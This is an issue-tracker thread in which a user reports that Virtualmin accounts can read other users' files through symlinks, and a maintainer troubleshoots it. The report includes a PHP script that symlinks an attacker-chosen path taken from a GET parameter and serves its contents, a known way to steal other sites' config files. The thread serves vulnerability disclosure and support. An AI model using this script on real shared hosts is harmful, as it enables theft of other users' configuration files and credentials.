Symlink User Bypass Security Issue

Dear Virtualmin team,

I found that virtualmin on my box can be bypass user permission by creating a symlink file. In easy way, user A create a .txt file that link to another config.php file at another user home dir, and then he can easily read it.

$k = $_GET['c']; $flib = "data.txt";

if ($k == "") { die; }else{ unlink($flib); $sym = $k; $link = getcwd() . "/" . $flib; symlink($sym, $link); if ($k{0} == "/") { echo " window.location = '" . $flib . "'"; }else{ echo "

<

pre>"; echo readlink($flib) . "\n"; echo "Filesize: " . linkinfo($flib) . "B\n\n"; $ddir = getcwd(); $file2 = str_replace($DOCUMENT_ROOT,'' , $ddir); $file2 = "http://" . $SERVER_NAME . $filee . $flib; $result = file_get_contents($file2); echo $result;

i m not sure that move ls and ln command to /root folder could fix this issue or not. Tell me more about what happen if i move 2 command and virtualmin will not working properly.

Thanks, NhanCM

Status: 
Active

Comments

Do you mean one user can read another user's files via a symlink like this?

This shouldn't be possible, as each user's home dir is readable only by the domain's group.

@JamieCameron : Yes, one user can read all of other user dir on my box, this attack also named local attack.

And i wish, any one here can fix this to make user can not access outside his/her directory folder.

Thanks,

The default settings in Virtualmin are for home directories to be non-world-readable.

What are the permissions on the target user's home directory?

-rw-r--r-- *.php for all as default uploading via FTP client. <<< it's result when i try ls -la *.php

Yes, home user are jail to his/her /home directory folder and it's default config now in my box.

Thanks,

How about the /home/targetusername directory? I'd be interested to see the permissions as shown by ls -ld /home/targetusername

-rw-r--r-- too, this is default on target directory.

Ok .. so if you SSH in as the user who created the symlink, can you read from it with cat ?

NO

the funny thing is that, but in php getcontent is OKAY

phim_moss@nltit $ cat /home/phim_moss/public_html/test/sniper4.txt cat: /home/phim_moss/public_html/test/sniper4.txt: Permission denied

Which PHP execution mode do you have enabled for this domain (at Server Configuration -> Website Options) ?

That's odd, as PHP scripts should execute with domain owner permissions.

If you upload a simple script in the source domain that prints the permissions it run as like :

<?php
system("id -a");
?>

what does it output?

uid=508(phim_moss) gid=508(phim_moss) groups=508(phim_moss) <<< the out put.

sorry for late reply, now is 9am in vietnam

Ok, so it is clearly running with domain owner permissions ...

I don't see how it could possibly access a file that you can't access from the shell. I'd have to login to your system myself as the source user to see what is going on.